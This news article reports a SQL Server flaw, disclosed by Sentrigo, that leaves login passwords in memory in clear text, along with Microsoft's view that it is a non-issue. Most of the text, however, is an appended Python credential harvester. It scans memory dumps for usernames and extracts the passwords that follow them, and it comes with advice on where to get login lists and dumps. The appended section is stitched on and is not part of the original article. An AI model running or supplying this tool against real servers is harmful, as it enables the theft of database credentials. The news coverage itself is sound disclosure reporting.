SQL Server vulnerability is a 'non-issue', says Microsoft

Microsoft is downplaying a SQL Server security flaw that lets someone who already holds administrative privileges read users' passwords in clear text. The vulnerability was discovered last year by database security vendor Sentrigo when one of its researchers noticed that the unique string of his personal password was visible in SQL Server's memory.

"Passwords used to log in to SQL Server are stored in memory in clear text," explained Sentrigo CTO Slavik Markovich. "These are not erased until SQL Server is restarted, so (they) may in many cases include passwords going back for weeks or months in production environments. It is a simple matter of dumping memory in byte format, and reviewing the contents looking for usernames, which will be followed by the password."

Despite this, Microsoft contends the vulnerability is much ado about nothing. "Microsoft has thoroughly investigated claims of vulnerabilities in SQL Server and found that these are not product vulnerabilities requiring Microsoft to issue a security update," a spokesman said. The disagreement turns on the precondition: dumping another process's memory already requires administrative rights on the host, so the attacker has crossed the trust boundary before the search for passwords begins, while the exposure Sentrigo points to is that those passwords remain recoverable long after the sessions that used them have ended.
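The search Markovich describes, dumping memory as bytes and looking for a known username followed by its password, can be illustrated with a small scanner. The code below is an added example, not Sentrigo's tool or anything from the article; it runs over a constructed byte buffer that stands in for a memory dump (the real layout of SQL Server's process memory is not described in the article, and the assumptions that login strings appear NUL-separated in either ASCII or UTF-16LE, that the password is the next printable run within 64 bytes, and the `harvest` function and sample credentials are all the example's own). It also shows the check a practitioner wants when the username is as short as `sa`: require the match to be bounded by non-printable bytes, so the two letters inside some longer word are not mistaken for a login.

```python
import re

# Printable-ASCII runs of at least four characters, in the two encodings the
# example assumes a login string might take (assumption: the article does not
# say how SQL Server lays these out).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def _bounded_pattern(needle: bytes, utf16: bool) -> re.Pattern:
    """Match `needle` only when it is not glued to other printable text on
    either side. Without this, a two-letter login such as 'sa' would match
    inside any word that happens to contain those letters."""
    edge = rb"[\x20-\x7e]\x00" if utf16 else rb"[\x20-\x7e]"
    return re.compile(rb"(?<!" + edge + rb")" + re.escape(needle) + rb"(?!" + edge + rb")")


def harvest(dump: bytes, usernames, window: int = 64):
    """Scan `dump` for each username and report the first printable string
    that follows it within `window` bytes, on the article's premise that the
    password sits right after the username in memory.

    Returns a list of (username, offset, encoding, candidate_password)."""
    hits = []
    for user in usernames:
        passes = (
            ("ascii", user.encode("ascii"), ASCII_RUN, False),
            ("utf-16-le", user.encode("utf-16-le"), UTF16_RUN, True),
        )
        for codec, needle, run_re, utf16 in passes:
            for m in _bounded_pattern(needle, utf16).finditer(dump):
                end = min(len(dump), m.end() + window)
                run = run_re.search(dump, m.end(), end)
                if run:  # nothing printable nearby means no candidate for this occurrence
                    hits.append((user, m.start(), codec, run.group().decode(codec)))
    return hits


# Constructed stand-in for a memory dump: NUL padding, binary noise, one
# ASCII-encoded login pair, one more ASCII pair, one UTF-16LE pair, and a
# trailing 'sa' with nothing usable after it. None of this is real data.
SAMPLE_DUMP = (
    b"\x00" * 8
    + b"sa\x00\x00\x00P@ssw0rd!\x00\x00\x00"
    + b"\x7f\x01\x02\xff" * 3
    + b"dbuser\x00Winter2009\x00"
    + b"\x00" * 4
    + "reportsvc".encode("utf-16-le") + b"\x00\x00"
    + "Tr0ub4dor&3".encode("utf-16-le") + b"\x00\x00"
    + b"password\x00sa\x00"
)


if __name__ == "__main__":
    for user, offset, codec, secret in harvest(SAMPLE_DUMP, ["sa", "dbuser", "reportsvc"]):
        print(f"{user!r} at 0x{offset:04x} ({codec}): {secret!r}")
```

The list of usernames to search for would come from `sys.sql_logins` or the server's login audit, and the dump from whatever process-memory tool the administrator already has; the article names neither, so the example takes both as inputs. Note that the final `sa` at the end of the buffer produces no hit: a match with no printable run after it is dropped rather than reported as an empty password.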